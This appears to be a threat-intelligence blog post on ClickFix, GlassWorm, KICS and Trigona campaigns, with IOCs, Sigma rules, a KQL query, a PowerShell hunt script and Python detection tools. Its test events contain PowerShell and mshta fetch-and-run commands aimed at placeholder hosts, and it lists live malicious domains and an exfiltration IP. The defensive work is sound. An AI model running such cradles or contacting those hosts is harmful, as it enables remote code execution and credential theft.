
ClickFix, GlassWorm & KICS Supply Chain Attacks: OTX Pulse Analysis — Multi-Vector Infostealer Campaigns

Security Arsenal Team
April 26, 2026
6 min read

Excerpt

Live OTX analysis reveals ClickFix infostealers, GlassWorm dev attacks, and KICS supply chain compromises targeting finance and tech.

Threat Summary

Recent OTX pulses indicate a convergence of diverse threat vectors—social engineering, supply chain compromise, and traffic distribution systems—united by the objective of credential theft and data exfiltration. Threat actors are increasingly leveraging "living-off-the-land" (LotL) techniques via ClickFix campaigns targeting Windows and macOS users in the finance and travel sectors. Simultaneously, sophisticated supply chain attacks via compromised Docker images (KICS) and malicious code repositories (GlassWorm) are specifically hunting developer credentials and crypto wallets. The appearance of Trigona ransomware affiliates using custom exfiltration tools suggests these credential theft operations are feeding directly into encryption and extortion workflows.

Threat Actor / Malware Profile

ClickFix Campaigns (Lumma, Vidar, Redline)

  • Distribution: Social engineering via fake browser error or verification pages that instruct the user to paste a supplied command into the Run dialog or a terminal, so the victim executes the loader themselves.
  • Payload Behavior: The pasted command (PowerShell on Windows, bash on macOS) downloads and runs a loader. Distributes information stealers (Lumma, Vidar, Redline) and RATs (NetSupport).
  • C2 Communication: HTTP/HTTPS to domain generation algorithm (DGA) style domains.
  • Persistence: Scheduled tasks or startup folder entries established via the initial script.

GlassWorm

  • Distribution: Compromised code repositories and package managers.
  • Payload Behavior: Staged malware fingerprinting the machine. Installs a fake browser extension for surveillance and a RAT. Steals crypto wallets and dev tokens.
  • C2 Communication: Unique technique using the Solana blockchain for payload fetching and C2, bypassing traditional network detection.
  • Persistence: Browser extension injection and hidden startup scripts.

TeamPCP (Canister Worm / KICS Compromise)

  • Distribution: Poisoned Docker Hub images (Checkmarx KICS) and VS Code extensions.
  • Payload Behavior: mcpAddon.js and trojanized binaries scan infrastructure-as-code for credentials and exfiltrate them.
  • C2 Communication: Encrypted HTTP traffic to hardcoded IPs (e.g., 94.154.172.43).
  • Persistence: Tied to the trojanized artifact rather than to any single host; every CI/CD run that pulls the poisoned image tag or loads the extension re-executes the implant.

Trigona Affiliates (Rhantus)

  • Distribution: Initial access likely via previously mentioned loaders or direct exploitation.
  • Payload Behavior: Deployment of uploader_client.exe for custom, multi-threaded exfiltration before encryption. Abuses kernel drivers (WKTools, DumpGuard) to kill EDR processes.
  • C2 Communication: Custom protocol with connection rotation to evade network monitoring.

IOC Analysis

The pulses contain a mix of network and file-based IOCs:

  • Domains (ClickFix/Keitaro): A high volume of domains (e.g., ustazazharidrus.com, ucaboodle.com) associated with traffic distribution systems (TDS) and landing pages. SOC teams should block these at the DNS layer and search DNS and proxy logs for historical resolutions, since a hit from before the block went in means a user already reached the lure.
  • IPv4 (Supply Chain): 94.154.172.43 is the exfiltration destination for the trojanized KICS binary. Block it immediately at the perimeter and check egress logs from CI/CD runners and developer workstations for prior connections; any hit means the IaC credentials scanned by that runner should be treated as exposed.
  • File Hashes: Several MD5, SHA1, and SHA256 hashes for the KICS malware (e.g., MD5 d47de3772f2d61a043e7047431ef4cf4) and Trigona tools (e.g., SHA256 e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173). Load them into EDR block lists so matching files are quarantined, but treat hash matches as a floor: a recompiled build changes every hash, so the behavioral rules below matter more over time.

Operationalization: Ingest these IOCs into your SIEM for correlation and use a threat intelligence platform (TIP) to push them to firewall and DNS block lists automatically. Review the Keitaro TDS domains for brand-impersonation patterns (cibcsecurity2fa.com and rbcdevice-login.com imitate CIBC and RBC login flows, with "2fa", "device" and "login" as lure words) and use those patterns to seed future hunts for lookalike registrations.
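
To make the "identify typosquatting patterns" step concrete, here is an added example (not tooling from the pulse or from Security Arsenal) that tokenizes the pulse domains into brand and lure words, classifies each one, and derives a hunting regex for lookalike registrations the pulse does not yet list. The brand and lure keyword lists are assumptions for illustration; the domain list is the page's own.

```python
"""Triage the ClickFix/Keitaro TDS domains from the pulse for brand-impersonation
patterns and turn the result into a hunting regex for lookalikes not yet seen.
Added example, not tooling from the original pulse or from Security Arsenal; the
brand and lure keyword lists are assumptions for illustration."""
import re

# Domains from the pulse (the same list the KQL hunt on this page uses).
PULSE_DOMAINS = [
    "ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com",
    "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com",
    "ucaboodle.com", "someotherbox.com", "your-link.online", "linda-makeup.com",
    "cibcsecurity2fa.com", "rbcdevice-login.com",
]

# Assumed for illustration; tune to the brands your users actually bank and log in with.
BRAND_TOKENS = {"cibc", "rbc", "scotiabank", "paypal", "microsoft"}
LURE_TOKENS = {"login", "signin", "secure", "security", "2fa", "mfa", "device",
               "account", "verify", "verification", "help", "support", "update"}
VOCAB = sorted(BRAND_TOKENS | LURE_TOKENS, key=len, reverse=True)  # longest match first


def registrable_label(domain: str) -> str:
    """Second-level label ('cibcsecurity2fa' for 'cibcsecurity2fa.com'). Assumes a
    single-label public suffix; use a public-suffix library for .co.uk-style TLDs."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def segment(part: str) -> list[str]:
    """Carve known tokens out of a run-together label: 'cibcsecurity2fa' ->
    ['cibc', 'security', '2fa']. Unrecognised runs are kept as a single chunk."""
    tokens, unknown, i = [], "", 0
    while i < len(part):
        hit = next((w for w in VOCAB if part.startswith(w, i)), None)
        if hit is None:
            unknown += part[i]
            i += 1
            continue
        if unknown:
            tokens.append(unknown)
            unknown = ""
        tokens.append(hit)
        i += len(hit)
    if unknown:
        tokens.append(unknown)
    return tokens


def classify(domain: str) -> dict:
    tokens = [t for part in registrable_label(domain).split("-") if part for t in segment(part)]
    brands = sorted(t for t in tokens if t in BRAND_TOKENS)
    lures = sorted(t for t in tokens if t in LURE_TOKENS)
    if brands and lures:
        verdict = "brand-impersonation"      # block, and warn the impersonated brand's users
    elif lures:
        verdict = "generic-credential-lure"  # credential phishing without a named brand
    else:
        verdict = "no-lexical-signal"        # likely a TDS/redirector; block, nothing to reuse
    return {"domain": domain, "tokens": tokens, "brands": brands, "lures": lures, "verdict": verdict}


def triage(domains: list[str]) -> list[dict]:
    return [classify(d) for d in domains]


def hunt_regex(results: list[dict]) -> re.Pattern:
    """Build a regex from the brands actually impersonated so DNS/proxy logs can be
    searched for new registrations of the same shape (brand ... lure)."""
    brands = sorted({b for r in results for b in r["brands"]}) or sorted(BRAND_TOKENS)
    brand_alt = "|".join(map(re.escape, brands))
    lure_alt = "|".join(map(re.escape, sorted(LURE_TOKENS, key=len, reverse=True)))
    return re.compile(rf"(?:^|\.)(?:{brand_alt})[a-z0-9-]*(?:{lure_alt})[a-z0-9-]*\.", re.IGNORECASE)


if __name__ == "__main__":
    results = triage(PULSE_DOMAINS)
    for r in results:
        print(f"{r['domain']:<24} {r['verdict']:<24} tokens={r['tokens']}")
    print("hunt regex:", hunt_regex(results).pattern)
```

The verdicts drive the response: brand impersonation hits justify notifying the impersonated brand's users and feeding the derived regex into DNS and proxy hunts, while "no-lexical-signal" domains are plain TDS hops that are blocked but give no reusable pattern.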

Detection Engineering

yaml
title: Potential ClickFix PowerShell Execution Pattern
id: c0a1b2c3-4d5e-6f78-90ab-cdef01234567
description: Detects PowerShell launched with a download-and-execute cradle either from the Windows Run dialog (explorer.exe parent) or with lure text in the command line, the pattern produced when a user pastes a "fix" or "verification" command suggested by a fake browser error page.
status: experimental
date: 2026/04/26
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/660000000000
logsource:
    product: windows
    category: process_creation
detection:
    selection_image:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cradle:
        CommandLine|contains:
            - 'invoke-expression'
            - 'iex'
            - 'invoke-webrequest'
            - 'iwr'
            - 'invoke-restmethod'
            - 'irm'
            - 'downloadstring'
    selection_run_dialog:
        # Win+R is hosted by explorer.exe; administrators rarely paste cradles there
        ParentImage|endswith: '\explorer.exe'
    selection_lure:
        # Lure text is often appended as a comment so the Run dialog looks benign
        CommandLine|contains:
            - 'error'
            - 'fix'
            - 'support'
            - 'verification'
            - 'not a robot'
    condition: selection_image and selection_cradle and (selection_run_dialog or selection_lure)
falsepositives:
    - Administrators pasting remote install one-liners that happen to contain a lure word or are run from the Run dialog
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1204.004
---
title: Malicious KICS Binary or VS Code Extension Execution
id: d1e2f3a4-5b6c-7d8e-9f01-234567890abc
description: Detects execution of the trojanized Checkmarx KICS binary by file hash, or a command line that loads mcpAddon.js from the compromised VS Code extension. Uses process_creation because the Sysmon Hashes field only exists on Event ID 1; file_event (Event ID 11) carries no hashes. Covers Windows developer workstations and build agents; the KICS container image is Linux, so pair this with an equivalent Linux or container-runtime rule.
status: experimental
date: 2026/04/26
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/660000000002
logsource:
    product: windows
    category: process_creation
detection:
    selection_hash:
        # Sysmon writes Hashes as 'MD5=...,SHA256=...'; Sigma string matching is case-insensitive
        Hashes|contains:
            - 'MD5=d47de3772f2d61a043e7047431ef4cf4'
            - 'SHA1=250f3633529457477a9f8fd3db3472e94383606a'
            - 'SHA256=222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b'
    selection_stager:
        CommandLine|contains: '\mcpAddon.js'
    condition: 1 of selection_*
falsepositives:
    - None expected for a hash match; a legitimate KICS build will not carry these hashes
    - Verify any mcpAddon.js hit against the publisher's current extension release
level: critical
tags:
    - attack.initial_access
    - attack.t1195.002
    - attack.supply_chain
---
title: Trigona Custom Exfiltration Tool Execution
id: e2f3a4b5-c6d7-8e9f-0123-456789abcdef
description: Detects the execution of Trigona affiliate custom uploader client and associated kernel driver abuse tools.
status: experimental
date: 2026/04/26
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/660000000004
logsource:
    product: windows
    category: process_creation
detection:
    selection_uploader:
        # Match by path or by PE original name so a renamed copy is still caught
        - Image|endswith: '\uploader_client.exe'
        - OriginalFileName: 'uploader_client.exe'
    selection_tools:
        Image|endswith:
            - '\WKTools.exe'
            - '\DumpGuard.exe'
    condition: 1 of selection_*
falsepositives:
    - Rare; administrators using WKTools or DumpGuard for driver work (uploader_client.exe is a custom affiliate tool with no expected legitimate use)
level: high
tags:
    - attack.exfiltration
    - attack.t1041
    - attack.defense_evasion
    - attack.t1562.001
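
The ClickFix detection logic written out as runnable Python and exercised against constructed process-creation events, as an added example that is not part of the original page: a PowerShell image, a download cradle in the command line, and either an explorer.exe parent (the Win+R Run dialog) or lure text. Field names follow Sysmon Event ID 1 as Sigma maps them; the events and the example.invalid hostnames are constructed.

```python
"""Run the ClickFix process-creation logic against sample events.  Added example, not
code from the original pulse or from Security Arsenal; the events below are constructed
and use Sysmon Event ID 1 field names as Sigma maps them (Image, ParentImage, CommandLine)."""

# Mirrors the Sigma selections: PowerShell image, a download-and-execute cradle, and
# either the Run-dialog launch path (explorer.exe parent) or lure text in the command line.
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
CRADLE_TOKENS = ("invoke-expression", "iex", "invoke-webrequest", "iwr",
                 "invoke-restmethod", "irm", "downloadstring")
RUN_DIALOG_PARENTS = ("\\explorer.exe",)
LURE_TOKENS = ("error", "fix", "support", "verification", "not a robot")


def is_clickfix(event: dict) -> bool:
    """True when the event matches the ClickFix pattern (case-insensitive, like Sigma)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return False
    if not any(token in cmd for token in CRADLE_TOKENS):
        return False
    return parent.endswith(RUN_DIALOG_PARENTS) or any(token in cmd for token in LURE_TOKENS)


def hunt(events: list[dict]) -> list[str]:
    """Return the EventIds that fire, in input order."""
    return [e["EventId"] for e in events if is_clickfix(e)]


# Constructed sample telemetry (example.invalid is an RFC 2606 reserved name).
SAMPLE_EVENTS = [
    {   # Classic ClickFix: pasted into Win+R, cradle plus the fake-CAPTCHA comment
        "EventId": "evt-1", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/a)" '
                       '# I am not a robot - reCAPTCHA Verification ID: 8421',
    },
    {   # Scheduled admin script: no cradle, does not fire
        "EventId": "evt-2", "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # Admin pasting an installer one-liner in Windows Terminal: cradle present, but no
        # lure text and not launched from the Run dialog. This is the documented
        # false-positive trade-off and deliberately does not fire.
        "EventId": "evt-3", "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": 'pwsh -c "iex (iwr https://example.invalid/install.ps1)"',
    },
    {   # Run-dialog launch without any lure text still fires via the parent check
        "EventId": "evt-4", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -c "irm http://example.invalid/s | iex"',
    },
    {   # mshta-based ClickFix variant is out of scope for this rule (image is not PowerShell)
        "EventId": "evt-5", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/fix.hta",
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["EventId"], "ALERT" if is_clickfix(event) else "ok")
```

Evt-5 is the reminder that the rule is scoped to PowerShell: mshta, cmd and macOS Terminal variants of the same lure need their own rules with the same parent-or-lure structure.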


kql
// Hunt for ClickFix and Keitaro TDS domain connections (Microsoft Defender XDR advanced hunting)
// DeviceNetworkEvents has no RemoteDomain column, and RemoteUrl may hold either a bare
// hostname or a full URL, so match with has_any rather than an exact "in" comparison.
let MaliciousDomains = dynamic(["ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com", "ucaboodle.com", "someotherbox.com", "your-link.online", "linda-makeup.com", "cibcsecurity2fa.com", "rbcdevice-login.com"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (MaliciousDomains)
| summarize Connections = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp),
            Processes = make_set(InitiatingProcessFileName), Users = make_set(InitiatingProcessAccountName)
    by DeviceName, RemoteUrl, RemoteIP
| order by Connections desc;


powershell
# PowerShell Hunt Script for Trigona, KICS and GlassWorm Artifacts
# Checks for known-bad file hashes, known-bad tool names and recently changed browser extensions

# Hashes from the OTX pulses: 32 hex chars = MD5, 64 hex chars = SHA256.
# The algorithm is chosen by hash length so the SHA256 entries are actually compared
# (hashing everything with MD5 would silently never match them).
$maliciousHashes = @(
    "d47de3772f2d61a043e7047431ef4cf4",
    "e1023db24a29ab0229d99764e2c8deba",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",
    "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173",
    "816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019"
) | ForEach-Object { $_.ToLower() }
$md5Set    = $maliciousHashes | Where-Object { $_.Length -eq 32 }
$sha256Set = $maliciousHashes | Where-Object { $_.Length -eq 64 }

# Tool and stager names called out in the pulses (cheap check that survives a recompiled binary)
$maliciousNames = @("uploader_client.exe", "WKTools.exe", "DumpGuard.exe", "mcpAddon.js")

Write-Host "Scanning for malicious file hashes and names..."

# Common drop locations; extend with your own staging paths
$paths = @("C:\Users\*\Downloads\", "C:\Users\*\AppData\Local\Temp\", "C:\Windows\Temp\", "C:\ProgramData\")

foreach ($path in $paths) {
    if (-not (Test-Path $path)) { continue }
    Get-ChildItem -Path $path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        if ($maliciousNames -contains $file.Name) {
            Write-Host "[ALERT] Known malicious file name: $($file.FullName)" -ForegroundColor Red
        }
        # Skip very large files to keep the sweep fast; the implants here are small
        if ($file.Length -gt 50MB) { return }
        $md5 = Get-FileHash -Path $file.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
        $sha = Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
        if (($md5 -and $md5Set -contains $md5.Hash.ToLower()) -or
            ($sha -and $sha256Set -contains $sha.Hash.ToLower())) {
            Write-Host "[ALERT] Malicious file hash match: $($file.FullName)" -ForegroundColor Red
        }
    }
}

# Check for suspicious browser extensions (GlassWorm installs a fake extension for surveillance).
# All profiles are checked, not only "Default".
$extRoots = @(
    "$env:LOCALAPPDATA\Google\Chrome\User Data\*\Extensions",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\*\Extensions"
)

Write-Host "Checking for recently changed browser extensions..."
foreach ($extRoot in $extRoots) {
    Get-ChildItem -Path $extRoot -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $ext = $_
        # Extensions installed or updated in the last 7 days; report the manifest name for triage
        if ($ext.LastWriteTime -gt (Get-Date).AddDays(-7)) {
            $manifest = Get-ChildItem -Path $ext.FullName -Filter manifest.json -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1
            $name = if ($manifest) { (Get-Content $manifest.FullName -Raw | ConvertFrom-Json).name } else { "unknown" }
            Write-Host "[INFO] Recently modified extension: $($ext.Name) ($name) in profile $($ext.Parent.Parent.Name)" -ForegroundColor Yellow
        }
    }
}

Response Priorities

Immediate (0-4 hours):

  • Block IOCs: Implement immediate blocking of all listed domains and IP addresses (94.154.172.43) on firewalls and Secure Web Gateways (SWG).
  • Hunt Artifacts: Execute the PowerShell script across endpoints to hunt for the presence of Trigona uploader tools and KICS malware.
  • Container Quarantine: Identify and isolate any instances running the compromised KICS Docker tags (v2.1.20, v2.1.21, alpine).

24 Hours:

  • Credential Reset: If credential theft is suspected (Lumma/Vidar/RedLine), force password resets for accounts used from infected machines and revoke their active sessions, since these stealers also take browser cookies and session tokens. Revoke and reissue GitHub, package-registry and cloud API keys for developers potentially targeted by GlassWorm or exposed through the KICS compromise.
  • VS Code Audit: Audit developer workstations for the compromised VS Code extension versions (1.17.0, 1.19.0) and remove them.

1 Week:

  • Pipeline Hardening: Review and harden CI/CD pipelines so that images are pulled by immutable digest (image@sha256:...) rather than by mutable tag, with the digests recorded in the pipeline definition, and so that npm dependencies are installed from a lockfile whose entries carry integrity hashes (npm ci). A swapped tag or tarball then fails the build instead of running.
  • Training: Conduct security awareness training focusing on "ClickFix" social engineering tactics—specifically the danger of running terminal commands suggested by browser error pop-ups.
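
An added example (not from the page, Checkmarx, or any CI vendor) of the integrity check the pipeline hardening item calls for: it scans Dockerfile FROM lines and CI `image:` keys, classifies each image reference as digest-pinned, unpinned, or one of the KICS tags the pulse lists as compromised, and checks a package-lock.json for entries missing integrity hashes. The Dockerfile, workflow and lockfile inputs are constructed, and the image-reference parser assumes no registry port.

```python
"""Pipeline integrity check for the hardening step above: flag container image references
pulled by mutable tag instead of immutable digest, call out the KICS tags the pulse lists
as compromised, and verify that a package-lock.json carries integrity hashes.  Added
example, not code from the original page or from Checkmarx; the Dockerfile, workflow and
lockfile below are constructed."""
import json
import re

# Tags of checkmarx/kics that the pulse reports as poisoned.
COMPROMISED_KICS_TAGS = {"v2.1.20", "v2.1.21", "alpine"}

# name[:tag][@sha256:digest]; assumes no registry port (registry:5000/...) for brevity.
IMAGE_REF = re.compile(
    r"^(?P<name>[a-z0-9][a-z0-9._/-]*?)(?::(?P<tag>[A-Za-z0-9_.-]+))?"
    r"(?:@sha256:(?P<digest>[0-9a-f]{64}))?$"
)
# Dockerfile FROM lines, capturing build-stage aliases so 'FROM build' is not flagged.
FROM_LINE = re.compile(
    r"^\s*FROM\s+(?:--platform=\S+\s+)?(?P<ref>\S+)(?:\s+AS\s+(?P<stage>\S+))?",
    re.IGNORECASE | re.MULTILINE,
)
# 'image:' keys as used by GitHub Actions containers/services, GitLab CI and Compose.
IMAGE_KEY = re.compile(r"^\s*(?:-\s*)?image:\s*['\"]?(?P<ref>[^'\"\s]+)", re.MULTILINE)


def check_image_ref(ref: str) -> tuple[str, str]:
    """Classify one image reference: pinned / unpinned / known-compromised-tag / unparseable."""
    m = IMAGE_REF.match(ref.strip())
    if not m:
        return ("unparseable", ref)
    name, tag, digest = m.group("name"), m.group("tag"), m.group("digest")
    # A digest does not rescue a compromised tag: the digest may be the poisoned build itself.
    if name.endswith("checkmarx/kics") and tag in COMPROMISED_KICS_TAGS:
        return ("known-compromised-tag", ref)
    return ("pinned", ref) if digest else ("unpinned", ref)


def audit_pipeline_text(text: str) -> list[tuple[str, str]]:
    """Extract every image reference from a Dockerfile or CI YAML and classify it."""
    stages = {m.group("stage").lower() for m in FROM_LINE.finditer(text) if m.group("stage")}
    refs = [m.group("ref") for m in FROM_LINE.finditer(text)]
    refs += [m.group("ref") for m in IMAGE_KEY.finditer(text)]
    return [check_image_ref(r) for r in refs
            if r.lower() not in stages and r.lower() != "scratch" and not r.startswith("$")]


def audit_lockfile(lock: dict) -> list[str]:
    """package-lock.json v2/v3: every fetched package should carry an 'integrity' field
    (sha512-... or sha256-...) so that `npm ci` rejects a swapped tarball. Returns the
    package paths that lack one; the root entry ('') and workspace links are skipped."""
    missing = []
    for path, meta in lock.get("packages", {}).items():
        if path == "" or meta.get("link"):
            continue
        if not str(meta.get("integrity", "")).startswith(("sha512-", "sha256-")):
            missing.append(path)
    return missing


# Constructed samples (digests are placeholders of the right length, not real builds).
SAMPLE_DOCKERFILE = f"""\
FROM checkmarx/kics:v2.1.20 AS scanner
FROM python:3.12-slim@sha256:{'a' * 64} AS build
FROM build
FROM node:20
"""
SAMPLE_WORKFLOW = f"""\
jobs:
  scan:
    runs-on: ubuntu-latest
    container:
      image: checkmarx/kics:alpine
    services:
      db:
        image: 'postgres:16@sha256:{'b' * 64}'
"""
SAMPLE_LOCK = {
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-" + "A" * 86 + "==",
        },
        "node_modules/untrusted": {"version": "0.0.1", "resolved": "https://example.invalid/untrusted.tgz"},
    },
}

if __name__ == "__main__":
    for verdict, ref in audit_pipeline_text(SAMPLE_DOCKERFILE) + audit_pipeline_text(SAMPLE_WORKFLOW):
        print(f"{verdict:<24} {ref}")
    print("lockfile entries without integrity:", audit_lockfile(json.loads(json.dumps(SAMPLE_LOCK))))
```

Run this as a pre-merge check on pipeline definitions and fail the build on anything other than "pinned"; the digest for a trusted image is obtained once with `docker inspect --format '{{index .RepoDigests 0}}'` after a verified pull and then committed alongside the pipeline.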
